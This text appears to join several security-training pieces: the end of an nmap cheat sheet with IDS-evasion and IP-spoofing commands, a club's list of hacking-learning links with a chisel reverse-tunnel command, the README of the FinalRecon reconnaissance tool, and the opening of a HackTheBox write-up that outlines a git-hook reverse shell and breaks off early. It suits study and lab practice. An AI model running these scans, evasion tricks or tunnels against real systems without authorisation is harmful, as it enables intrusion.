| --top-ports | nmap 192.168.1.1 --top-ports 2000 | Port scan the top x ports
| -p-65535 | nmap 192.168.1.1 -p-65535 | Leaving off initial port in range<br />makes the scan start at port 1|
| -p0- | nmap 192.168.1.1 -p0- | Leaving off end port in range makes the scan go through to port 65535|
Service and Version Detection
-----------------------------
| Switch | Example | Description |
|----|-----|----|
| -sV | nmap 192.168.1.1 -sV | Attempts to determine the version of the service running on port
| -sV --version-intensity | nmap 192.168.1.1 -sV --version-intensity 8 | Intensity level 0 to 9. Higher number increases possibility of correctness |
| -sV --version-light | nmap 192.168.1.1 -sV --version-light | Enable light mode. Lower possibility of correctness. Faster
| -sV --version-all | nmap 192.168.1.1 -sV --version-all | Enable intensity level 9. Higher possibility of correctness. Slower |
| -A | nmap 192.168.1.1 -A | Enables OS detection, version detection, script scanning, and traceroute
OS Detection
------------
| Switch | Example | Description |
|----|-----|----|
| -O | nmap 192.168.1.1 -O | Remote OS detection using TCP/IP<br />stack fingerprinting|
| -O --osscan-limit | nmap 192.168.1.1 -O --osscan-limit | If at least one open and one closed<br />TCP port are not found it will not try<br />OS detection against host|
| -O --osscan-guess | nmap 192.168.1.1 -O --osscan-guess | Makes Nmap guess more aggressively
| -O --max-os-tries | nmap 192.168.1.1 -O --max-os-tries 1 | Set the maximum number x of OS<br />detection tries against a target|
| -A | nmap 192.168.1.1 -A | Enables OS detection, version detection, script scanning, and traceroute
Timing and Performance
----------------------
| Switch | Example | Description |
|----|-----|----|
| -T0 | nmap 192.168.1.1 -T0 | Paranoid (0) Intrusion Detection<br />System evasion|
| -T1 | nmap 192.168.1.1 -T1 | Sneaky (1) Intrusion Detection System <br />evasion|
| -T2 | nmap 192.168.1.1 -T2 | Polite (2) slows down the scan to use <br />less bandwidth and use less target <br />machine resources|
| -T3 | nmap 192.168.1.1 -T3 | Normal (3) which is default speed |
| -T4 | nmap 192.168.1.1 -T4 | Aggressive (4) speeds scans; assumes <br />you are on a reasonably fast and <br />reliable network|
| -T5 | nmap 192.168.1.1 -T5 | Insane (5) speeds scan; assumes you <br />are on an extraordinarily fast network|
| Switch | Example input | Description |
|----|-----|----|
| --host-timeout <time> | 1s; 4m; 2h | Give up on target after this long
| --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time> | 1s; 4m; 2h | Specifies probe round trip time |
| --min-hostgroup/max-hostgroup <size<size> | 50; 1024 | Parallel host scan group <br />sizes|
| --min-parallelism/max-parallelism <numprobes> | 10; 1 | Probe parallelization |
| --scan-delay/--max-scan-delay <time> | 20ms; 2s; 4m; 5h | Adjust delay between probes
| --max-retries <tries> | 3 | Specify the maximum number <br />of port scan probe retransmissions|
| --min-rate <number> | 100 | Send packets no slower than <numberr> per second
| --max-rate <number> | 100 | Send packets no faster than <number> per second
NSE Scripts
-----------
| Switch | Example | Description |
|----|-----|----|
| -sC | nmap 192.168.1.1 -sC | Scan with default NSE scripts. Considered useful for discovery and safe |
| --script default | nmap 192.168.1.1 --script default | Scan with default NSE scripts. Considered useful for discovery and safe |
| --script | nmap 192.168.1.1 --script=banner | Scan with a single script. Example banner |
| --script | nmap 192.168.1.1 --script=http* | Scan with a wildcard. Example http |
| --script | nmap 192.168.1.1 --script=http,banner | Scan with two scripts. Example http and banner |
| --script | nmap 192.168.1.1 --script "not intrusive" | Scan default, but remove intrusive scripts |
| --script-args | nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.168.1.1 | NSE script with arguments |
Useful NSE Script Examples
| Command | Description |
|----|-----|
| nmap -Pn --script=http-sitemap-generator scanme.nmap.org | http site map generator
| nmap -n -Pn -p 80 --open -sV -vvv --script banner,http-title -iR 1000 | Fast search for random web servers |
| nmap -Pn --script=dns-brute domain.com | Brute forces DNS hostnames guessing subdomains
| nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1 | Safe SMB scripts to run |
| nmap --script whois* domain.com | Whois query
| nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org | Detect cross site scripting vulnerabilities |
| nmap -p80 --script http-sql-injection scanme.nmap.org | Check for SQL injections
Firewall / IDS Evasion and Spoofing
-----------------------------------
| Switch | Example | Description |
|----|-----|----|
| -f | nmap 192.168.1.1 -f | Requested scan (including ping scans) use tiny fragmented IP packets. Harder for packet filters |
| --mtu | nmap 192.168.1.1 --mtu 32 | Set your own offset size |
| -D | nmap -D 192.168.1.101,192.168.1.102, <br />192.168.1.103,192.168.1.23 192.168.1.1|
| Send scans from spoofed IPs
| -D | nmap -D decoy-ip1,decoy-ip2,your-own-ip,decoy-ip3,decoy-ip4 remote-host-ip | Above example explained |
| -S | nmap -S www.microsoft.com www.facebook.com | Scan Facebook from Microsoft (-e eth0 -Pn may be required)
| -g | nmap -g 53 192.168.1.1 | Use given source port number |
| --proxies | nmap --proxies http://192.168.1.1:8080, http://192.168.1.2:8080 192.168.1.1 | Relay connections through HTTP/SOCKS4 proxies
| --data-length | nmap --data-length 200 192.168.1.1 | Appends random data to sent packets
Example IDS Evasion command
nmap -f -t 0 -n -Pn –data-length 200 -D 192.168.1.101,192.168.1.102,192.168.1.103,192.168.1.23 192.168.1.1
Output
------
| Switch | Example | Description |
|----|-----|----|
| -oN | nmap 192.168.1.1 -oN normal.file | Normal output to the file normal.file
| -oX | nmap 192.168.1.1 -oX xml.file | XML output to the file xml.file |
| -oG | nmap 192.168.1.1 -oG grep.file | Grepable output to the file grep.file
| -oA | nmap 192.168.1.1 -oA results | Output in the three major formats at once |
| -oG - | nmap 192.168.1.1 -oG - | Grepable output to screen. -oN -, -oX - also usable
| --append-output | nmap 192.168.1.1 -oN file.file --append-output | Append a scan to a previous scan file |
| -v | nmap 192.168.1.1 -v | Increase the verbosity level (use -vv or more for greater effect)
| -d | nmap 192.168.1.1 -d | Increase debugging level (use -dd or more for greater effect) |
| --reason | nmap 192.168.1.1 --reason | Display the reason a port is in a particular state, same output as -vv
| --open | nmap 192.168.1.1 --open | Only show open (or possibly open) ports |
| --packet-trace | nmap 192.168.1.1 -T4 --packet-trace | Show all packets sent and received
| --iflist | nmap --iflist | Shows the host interfaces and routes |
| --resume | nmap --resume results.file | Resume a scan
Helpful Nmap Output examples
| Command | Description |
|----|-----|
| nmap -p80 -sV -oG - --open 192.168.1.1/24 | grep open | Scan for web servers and grep to show which IPs are running web servers
| nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d " " -f5 > live-hosts.txt | Generate a list of the IPs of live hosts |
| nmap -iR 10 -n -oX out2.xml | grep "Nmap" | cut -d " " -f5 >> live-hosts.txt | Append IP to the list of live hosts
| ndiff scanl.xml scan2.xml | Compare output from nmap using the ndif |
| xsltproc nmap.xml -o nmap.html | Convert nmap xml files to html files
| grep " open " results.nmap | sed -r 's/ +/ /g' | sort | uniq -c | sort -rn | less | Reverse sorted list of how often ports turn up
Miscellaneous Options
---------------------
| Switch | Example | Description |
|----|-----|----|
| -6 | nmap -6 2607:f0d0:1002:51::4 | Enable IPv6 scanning |
| -h | nmap -h | nmap help screen |
Other Useful Nmap Commands
--------------------------
| Command | Description |
|----|-----|
| nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn | Discovery only on ports x, no port scan
| nmap 192.168.1.1-1/24 -PR -sn -vv | Arp discovery only on local network, no port scan |
| nmap -iR 10 -sn -traceroute | Traceroute to random targets, no port scan
| nmap 192.168.1.1-50 -sL --dns-server 192.168.1.1 | Query the Internal DNS for hosts, list targets only
|
# RESOURCES
# Contents:
* [Linux](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#linux)
* [Web sec](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#web-sec)
* [Cryptography](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#cryptography)
* [Steganography](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#steganography)
* [OSINT](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#osint)
* [Binary exploitation](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#binary-exploitation)
* [Networking](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#networking)
* [Cloud sec](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#cloud-sec)
* [Windows](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#windows)
* [Bug bounty](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#windows)
* [General hacking resources](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#general-hacking-resources)
* [Other cool contents](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#other-cool-contents)
---
## Linux:
* Collection of Beginner to Advanced level resources: <br>https://www.notion.so/Linux-Resources-ad018e0a007347ab9d039cc2d29c3bf4
* Linux exercises[lab]:<br>https://overthewire.org/wargames/natas/
* Linux challenges: <br>https://tryhackme.com/room/zthlinux
* Introduction to tmux: <br>https://www.youtube.com/watch?v=Lqehvpe_djs
* Learn find command in linux : I have tried to cover most of the flags used in `find` command in incremental way.: <br>https://shishirsubedi.com.np/linux/find/
* Bash Pitfalls: <br>https://mywiki.wooledge.org/BashPitfalls
* Iptables:
* Part 1 : https://www.thegeekstuff.com/2011/01/iptables-fundamentals/
* Part 2 : https://www.thegeekstuff.com/2011/02/iptables-add-rule/
* Part 3 : https://www.thegeekstuff.com/2011/03/iptables-inbound-and-outbound-rules/
* Nmap cheat sheet: <br>https://shishirsubedi.com.np/network/nmap/
* Port Forwarding using chisel:
```
Local box : sudo ./chisel server -p 1880 --reverse
on Remote box : ./chisel client 10.6.31.213:1880 R:4506:127.0.0.1:4506
```
* Bypassing IDS for network scanning using nmap - Part 1: <br>https://redcodelabs.io/blog/exploring_nmap_1.html
* FFUF — Everything You Need To Know: <br>https://www.cybersecnerds.com/ffuf-everything-you-need-to-know/
* CURL — Everything You Need To Know: <br>https://www.cybersecnerds.com/curl-everything-you-need-to-know/
* static-binaries: <br>https://github.com/andrew-d/static-binaries
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## Web sec:
* CS253 - Web Security: <br>https://web.stanford.edu/class/cs253/
* Exces XSS: A comprehensive tutorial on cross-site-scripting: <br>https://excess-xss.com/
* Deserialization Attacks on Java:
* https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
* https://medium.com/swlh/hacking-java-deserialization-7625c8450334
* IPPSEC's Videos on PHP deserialization:
* https://www.youtube.com/watch?v=fHZKSCMWqF4
* https://www.youtube.com/watch?v=HaW15aMzBUM&t=50
* Good Resource for Manual SQL injection: <br>https://sqlwiki.netspi.com/
* Master the art of Cross Site Scripting: <br>https://brutelogic.com.br/blog/
* List of XSS payloads: <br>http://www.xss-payloads.com
* XXE 3 hour workshop: <br>https://gosecure.github.io/xxe-workshop/
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## Cryptography:
* Multiple crypto challenges:<br>https://cryptopals.com/
* Cryptography: <br>https://www.notion.so/Cryptography-4d846b9a6af44b9f995418d60f641a6a
* Quickly encoding, decoding, encryption, decryption, hashing:<br>https://medium.com/swlh/quickly-encoding-decoding-encryption-decryption-hashing-318f7b3ea11e
* CS255 stanford "Introduction to cryptography": <br>https://crypto.stanford.edu/~dabo/courses/OnlineCrypto/
* Hamming codes part 1 ...: <br>https://www.youtube.com/watch?v=X8jsijhllIA
* Hamming codes part 2 ...: <br>https://www.youtube.com/watch?v=b3NxrZOu_CE
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## Steganography:
* Steganography tools: <br>https://github.com/DominicBreuker/stego-toolkit
* Steganographic Decoder: <br>https://futureboy.us/stegano/decinput.html
* Steganographic Encoder: <br>https://futureboy.us/stegano/encinput.html
* Steganography Online[encode/decode]: <br>https://stylesuxx.github.io/steganography/
* Really good article on Steganography: <br>https://hackersonlineclub.com/steganography/
* Cheatsheet - Steganography 101: <br>https://pequalsnp-team.github.io/cheatsheet/steganography-101
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## OSINT:
* Collection of OSINT Tools: <br>https://osintframework.com/
* bellingcat - the home of online investigations: <br>https://www.bellingcat.com/
* Osint Curious OSINT Resource List: <br>https://docs.google.com/document/d/14li22wAG2Wh2y0UhgBjbqEvZJCDsNZY8vpUAJ_jJ5X8/edit#heading=h.5mxacuke75jk
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## Binary exploitation:
* Cool playlist for introduction : <br>https://www.youtube.com/watch?v=iyAyN3GFM7A
* Nightmare: An intro to binary exploitation/reverse engineering course based around CTF challenges: <br>https://guyinatuxedo.github.io/
* Exploit education: <br>https://exploit.education/
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## Networking:
* Networking tutorial: <br>https://www.youtube.com/playlist?list=PLowKtXNTBypH19whXTVoG3oKSuOcw_XeW
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## Cloud sec:
* Hacking the Cloud: The Encyclopedia for Offensive Security in the Cloud: <br>https://hackingthe.cloud/
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## Windows:
* Special privileges on windows and exploiting them to get a system shell: <br>https://2018.romhack.io/slides/RomHack%202018%20-%20Andrea%20Pierini%20-%20whoami%20priv%20-%20show%20me%20your%20Windows%20privileges%20and%20I%20will%20lead%20you%20to%20SYSTEM.pdf
* Playlist for Basics of Active Directory: <br>https://www.youtube.com/playlist?list=PL3B8L-z5QU-Yw80HOGXXUASBfv_K1WwO5
* Windows Privesc Cheat Sheet : Similar to gtfobins: <br>https://wadcoms.github.io/
* Attacking Active Directory: <br>https://zer1t0.gitlab.io/posts/attacking_ad/
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## Bug bounty:
* Awesome Bugbounty Writeups: <br>https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
* All the DOD Sites Listed in Bug Programs, Open-Scope, Automation lai sajilo hola :joy: [dod-sites.txt](./dod-sites.txt)
* How to Get Into Bug Bounties - Part 01: <br>https://0xprial.com/how-to-get-into-bug-bounties-part-01/
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## General hacking resources:
* hacking-resources: <br>https://gist.github.com/selftaught/23943c6f04e59171cf11d625f220bf24
* A course bundle of ethical hacking lessons: <br>https://drive.google.com/drive/folders/0B39jsuKsL3G8VFcxaG1jQ3BDQjg
* Yet another bundle of ethical hacking lessons/courses, but larger collection than the previous: <br>https://drive.google.com/drive/folders/1Se-U7xWI7-cK8Ez4hyFax5DCaZVAxzjU
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
---
## Other cool contents:
* https://gtfobins.github.io/gtfobins/tar/
* If you don't understand what some linux command's do with all the flags and pipes added, this site explains it pretty nicely: <br>https://explainshell.com/
* This repo has a lot of resources that may be required during a ctf challenge: <br>https://github.com/JohnHammond/ctf-katana
* OSCP notes: <br>https://hackanythingfor.blogspot.com/2020/08/oscp-personal-notes.html?m=1
* InfoSec Write-ups: <br>https://medium.com/bugbountywriteup
* Reverse-shell: <br>https://resources.infosecinstitute.com/icmp-reverse-shell/#gref
* Linux | Windows Privilege Escalation Labs/Workshops/Slides: <br>https://github.com/sagishahar/lpeworkshop
* This is an online sqlmap powered tool that allows you to perform a fast SQLi check. Link: <br>https://suip.biz/?act=sqlmap
* Why you can't get a root shell with a script with suid bit set and owned by root? <br>https://www.youtube.com/watch?v=-wGtxJ8opa8
* Privilege Escalation with LXD group: <br>https://www.hackingarticles.in/lxd-privilege-escalation/
* Privilage escalation to the host from docker if docker.socks is mounted on your container: <br>https://thearkcon.com/static/wu/inception.pdf
* https://pop-eax.github.io/blog/posts/ctf-writeup/web/2020/08/01/h-cktivitycon-ctf-specialorder/
* https://captf.com/practice-ctf/
* Simple VU Capture The Flag lab: <br>https://kernal.eu/posts/vuctflab/
* Brute XSS - Master the art of Cross Site Scripting.: <br>https://brutelogic.com.br/
* Behind the scenes of HTTPS: How does HTTPS actually work?: <br>https://robertheaton.com/2014/03/27/how-does-https-actually-work/
* What is ctf and how to get started: <br>https://dev.to/atan/what-is-ctf-and-how-to-get-started-3f04
* CTF challenges: <br>https://ctflearn.com/challenge/1/browse
* How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM: <br>https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
* From the person who is the owner of a popular repo in github "Seclists". It will make you feel bad for sure, but worth reading:
* How to Build a Cybersecurity Career [2019 Update] | Daniel Miessler: <br>https://danielmiessler.com/blog/build-successful-infosec-career/
* So You Want to Be a Hacker: 2021 Edition | By TheCyberMentor: <br>https://tcm-sec.com/so-you-want-to-be-a-hacker-2021-edition/
* How to Be an Ethical Hacker in 2021 | The Cyber Mentor: <br>https://www.youtube.com/watch?v=mdsChhW056A
* Bugs found in Facebook, writeups from @samm0uda: <br>https://ysamm.com/
* Ex-NSA hacker tells us how to get into hacking!: <br>https://www.youtube.com/watch?v=SFbV7sTSAlA
* A Collection of Tools | Rawsec's CyberSecurity Inventory: <br>https://inventory.raw.pm/
* The Confessions of the Hacker Who Saved the Internet: <br>https://www.wired.com/story/confessions-marcus-hutchins-hacker-who-saved-the-internet/
* We Hacked Apple for 3 Months: Here’s What We Found: <br>https://samcurry.net/hacking-apple/
* Collection of Github Repositories for 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 / 𝗣𝗲𝗻𝘁𝗲𝘀𝘁𝗶𝗻𝗴 / 𝗕𝘂𝗴 𝗕𝗼𝘂𝗻𝘁𝘆.
1. Book of Secret Knowledge = https://github.com/trimstray/the-book-of-secret-knowledge
2. Awesome Hacking = https://github.com/Hack-with-Github/Awesome-Hacking
3. Awesome Bug Bounty = https://github.com/djadmin/awesome-bug-bounty
4. Awesome Penetration Testing = https://github.com/wtsxDev/Penetration-Testing
5. Awesome Web Hacking = https://github.com/infoslack/awesome-web-hacking
6. Awesome Hacking Resources = https://github.com/vitalysim/Awesome-Hacking-Resources
7. Awesome Pentest = https://github.com/enaqx/awesome-pentest
8. Awesome Red Teaming = https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
9. Awesome Web Security = https://github.com/qazbnm456/awesome-web-security
10. Penetration Test Guide based on OWASP = https://github.com/Voorivex/pentest-guide
11. Pentest Compilation = https://github.com/adon90/pentest_compilation
12. Infosec Reference = https://github.com/rmusser01/Infosec_Reference
* iamrajivd/pentest: <br>https://github.com/iamrajivd/pentest
* CyberDefenders: Blue Team CTF Challenges: <br>https://cyberdefenders.org/labs/
* Free Tools | By SANS' Faculty: <br>https://www.sans.org/img/free-faculty-tools.pdf
*[Click here to go to top :arrow_up:](https://github.com/PCampus-InfoSec-Enthusiasts/learning-resources/#contents)*
.<br>
.<br>
.<br>
.<br>
*All the resources/links above are collected from 'RESOURCES' in our Discord Server; credits to the ones who shared them as well as to the ones who created them. Go to* [CONTRIBUTORS.md](./CONTRIBUTORS.md) *to see the list of contributors.*
|
<p align="center"><img src="https://i.imgur.com/rLENhCp.jpg"></p>
<p align="center">
<img src="https://img.shields.io/badge/Python-3-brightgreen.svg?style=plastic">
<img src="https://img.shields.io/badge/OSINT-red.svg?style=plastic">
<img src="https://img.shields.io/badge/Web-red.svg?style=plastic">
</p>
<p align="center">
<a href="https://twitter.com/thewhiteh4t"><b>Twitter</b></a>
<span> - </span>
<a href="https://t.me/thewhiteh4t"><b>Telegram</b></a>
<span> - </span>
<a href="https://thewhiteh4t.github.io"><b>thewhiteh4t's Blog</b></a>
</p>
FinalRecon is an **automatic web reconnaissance** tool written in python. Goal of FinalRecon is to provide an **overview** of the target in a **short** amount of time while maintaining the **accuracy** of results. Instead of executing **several tools** one after another it can provide similar results keeping dependencies **small and simple**.
## Available In
<p align="center">
<a href="https://www.kali.org/news/kali-linux-2020-4-release/">
<img width="150px" hspace="10px" src="https://i.imgur.com/yQRrCtC.png" alt="kali linux finalrecon">
</a>
<a href="https://blackarch.org/">
<img width="150px" hspace="10px" src="https://i.imgur.com/YZ5KDL1.png" alt="blackarch finalrecon">
</a>
<a href="https://secbsd.org/">
<img width="150px" hspace="10px" src="https://i.imgur.com/z36xL8c.png" alt="secbsd finalrecon">
</a>
<a href="https://tsurugi-linux.org/">
<img width="150px" hspace="10px" src="https://i.imgur.com/S1ylcp7.jpg" alt="tsurugi linux finalrecon">
</a>
<a href="https://www.tracelabs.org/initiatives/osint-vm">
<img width="150px" hspace="10px" src="https://i.imgur.com/COAbvYr.png" alt="tracelabs finalrecon">
</a>
</p>
## Featured
### Python For OSINT
* Hakin9 April 2020
* https://hakin9.org/product/python-for-osint-tooling/
### NullByte
* https://null-byte.wonderhowto.com/how-to/conduct-recon-web-target-with-python-tools-0198114/
* https://www.youtube.com/watch?v=F9lwzMPGIgo
### Hakin9
* https://hakin9.org/final-recon-osint-tool-for-all-in-one-web-reconnaissance/
## Features
FinalRecon provides detailed information such as :
* Header Information
* Whois
* SSL Certificate Information
* Crawler
* html
* CSS
* Javascripts
* Internal Links
* External Links
* Images
* robots
* sitemaps
* Links inside Javascripts
* Links from Wayback Machine from Last 1 Year
* DNS Enumeration
* A, AAAA, ANY, CNAME, MX, NS, SOA, TXT Records
* DMARC Records
* Subdomain Enumeration
* Data Sources
* BuffOver
* crt.sh
* ThreatCrowd
* AnubisDB
* ThreatMiner
* Facebook Certificate Transparency API
* Auth Token is Required for this source, read Configuration below
* VirusTotal
* API Key is Required
* Shodan
* API Key is Required
* CertSpotter
* Directory Searching
* Support for File Extensions
* Wayback Machine
* URLs from Last 5 Years
* Port Scan
* Fast
* Top 1000 Ports
* Export
* Formats
* txt
* json [Coming Soon]
## Configuration
### API Keys
Some Modules Use API Keys to fetch data from different resources, these are optional, if you are not using an API key, they will be simply skipped.
If you are interested in using these resources you can store your API key in **keys.json** file.
`Path --> $HOME/.config/finalrecon/keys.json`
If you don't want to use a key for a certain data source just set its value to `null`, by default values of all available data sources are null.
#### Facebook Developers API
This data source is used to fetch **Certificate Transparency** data which is used in **Sub Domain Enumeration**
Key Format : `APP-ID|APP-SECRET`
Example :
```
{
"facebook": "9go1kx9icpua5cm|20yhraldrxt6fi6z43r3a6ci2vckkst3"
}
```
Read More : https://developers.facebook.com/docs/facebook-login/access-tokens
#### VirusTotal API
This data source is used to fetch **Sub Domains** which are used in **Sub Domain Enumeration**
Key Format : `KEY`
Example :
```
{
"virustotal": "eu4zc5f0skv15fnw54nkhj4m26zbteh9409aklpxhfpp68s8d4l63pn13rsojt9y"
}
```
#### Shodan API
This data source is used to fetch **Sub Domains** which are used in **Sub Domain Enumeration**
Key Format : `KEY`
Example :
```
{
"shodan": "eu4zc5f0skv15fnw54nkhj"
}
```
#### BeVigil API
This data source is used to fetch **Sub Domains** which are used in **Sub Domain Enumeration**
Key Format : `KEY`
Example :
```
{
"bevigil": "bteh9409aklpxhfpp68s8d"
}
```
## Tested on
* Kali Linux
* BlackArch Linux
> FinalRecon is a tool for **Pentesters** and it's designed for **Linux** based Operating Systems, other platforms like **Windows** and **Termux** are **NOT** supported.
## Installation
### Kali Linux
```
sudo apt install finalrecon
```
### BlackArch Linux
```
sudo pacman -S finalrecon
```
### SecBSD
```bash
doas pkg_add finalrecon
```
### Other Linux
```bash
git clone https://github.com/thewhiteh4t/FinalRecon.git
cd FinalRecon
pip3 install -r requirements.txt
```
### Docker
``` bash
docker pull thewhiteh4t/finalrecon
docker run -it --entrypoint /bin/sh thewhiteh4t/finalrecon
```
Also docker user can use this alias to run the finalrecon as the normal CLI user.
``` bash
alias finalrecon="docker run -it --rm --name finalrecon --entrypoint 'python3' thewhiteh4t/finalrecon finalrecon.py"
```
And then use `finalrecon` to start your scan.
> remark
>
> If you have any api keys you can easily commit that image in your local machine.
>
> This docker usage needs root to run docker command.
## Usage
```bash
usage: finalrecon.py [-h] [--headers] [--sslinfo] [--whois] [--crawl] [--dns] [--sub]
[--dir] [--wayback] [--ps] [--full] [-t T] [-T T] [-w W] [-r] [-s]
[-sp SP] [-d D] [-e E] [-o O]
url
FinalRecon - The Last Web Recon Tool You Will Need | v1.1.4
positional arguments:
url Target URL
options:
-h, --help show this help message and exit
--headers Header Information
--sslinfo SSL Certificate Information
--whois Whois Lookup
--crawl Crawl Target
--dns DNS Enumeration
--sub Sub-Domain Enumeration
--dir Directory Search
--wayback Wayback URLs
--ps Fast Port Scan
--full Full Recon
Extra Options:
-t T Number of Threads [ Default : 30 ]
-T T Request Timeout [ Default : 30.0 ]
-w W Path to Wordlist [ Default : wordlists/dirb_common.txt ]
-r Allow Redirect [ Default : False ]
-s Toggle SSL Verification [ Default : True ]
-sp SP Specify SSL Port [ Default : 443 ]
-d D Custom DNS Servers [ Default : 1.1.1.1 ]
-e E File Extensions [ Example : txt, xml, php ]
-o O Export Output [ Default : txt ]
```
```bash
# Check headers
python3 finalrecon.py --headers <url>
# Check ssl Certificate
python3 finalrecon.py --sslinfo <url>
# Check whois Information
python3 finalrecon.py --whois <url>
# Crawl Target
python3 finalrecon.py --crawl <url>
# Directory Searching
python3 finalrecon.py --dir <url> -e txt,php -w /path/to/wordlist
# full scan
python3 finalrecon.py --full <url>
```
## Demo
[![Youtube](https://i.imgur.com/IQpZ67e.png)](https://www.youtube.com/watch?v=10q_CKnM3x4)
|
# OpenSource - HackTheBox - Writeup
Linux, 20 Base Points, Easy
![info.JPG](images/info.JPG)
## Machine
![OpenSource.JPG](images/OpenSource.JPG)
## TL;DR
To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22```, ```80``` and ```3000```.
***User***: From the ```source.zip``` file we found ```dev01``` credentials on ```dev``` branch, According to the source code we create a new route to get RCE, Create a tunnel using ```chisel``` scan for port ```3000``` and we found it on ```172.17.0.1``` with ```Gitea```, Log in to ```Gitea``` using ```dev01``` credentials (from the ```dev``` branch) and we get the ```id_rsa``` of ```dev01``` user.
***Root***: By running ```pspy``` we found the ```root``` runs ```git commit``` command, Using ```Git Hooks``` pre-commit we add a reverse shell to the pre-commit script and we get a reverse shell as ```root```.
![pwn.JPG](images/pwn.JPG)
## OpenSource Solution
### User
Let's start with ```nmap``` scanning:
```console
┌─[evyatar@parrot]─[/hackthebox/OpenSource]
└──╼ $ nmap -sV -sC -oA nmap/OpenSource 10.10.11.164
Starting Nmap 7.80 ( https://nmap.org ) at 2022-06-03 15:00 IDT
Nmap scan report for 10.10.11.164
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
| 256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
|_ 256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
80/tcp open http Werkzeug/2.1.2 Python/3.10.3
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/2.1.2 Python/3.10.3
| Date: Fri, 03 Jun 2022 12:00:30 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 5316
| Connection: close
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>upcloud - Upload files for Free!</title>
| <script src="/static/vendor/jquery/jquery-3.4.1.min.js"></script>
| <script src="/static/vendor/popper/popper.min.js"></script>
| <script src="/static/vendor/bootstrap/js/bootstrap.min.js"></script>
| <script src="/static/js/ie10-viewport-bug-workaround.js"></script>
| <link rel="stylesheet" href="/static/vendor/bootstrap/css/bootstrap.css"/>
| <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-grid.css"/>
| <link rel="stylesheet" href=" /static/vendor/bootstrap/css/bootstrap-reboot.css"/>
| <link rel=
| HTTPOptions:
| HTTP/1.1 200 OK
| Server: Werkzeug/2.1.2 Python/3.10.3
| Date: Fri, 03 Jun 2022 12:00:30 GMT
| Content-Type: text/html; charset=utf-8
| Allow: HEAD, OPTIONS, GET
| Content-Length: 0
| Connection: close
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
|_http-server-header: Werkzeug/2.1.2 Python/3.10.3
|_http-title: upcloud - Upload files for Free!
3000/tcp filtered ppp
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
By observing port 80 we get the following web page:
![port80.JPG](images/port80.JPG)
By clicking on [Download](http://10.10.11.164/download) we get the following [source.zip](./source.zip) file.
If we are clicking on [Take me there!](http://10.10.11.164/upcloud) button we are navigated to the following web page:
![upcloud.JPG](images/upcloud.JPG)
After uploading a test file we get the following page:
![testupload.JPG](images/testupload.JPG)
Let's observe the source code to understand the flow.
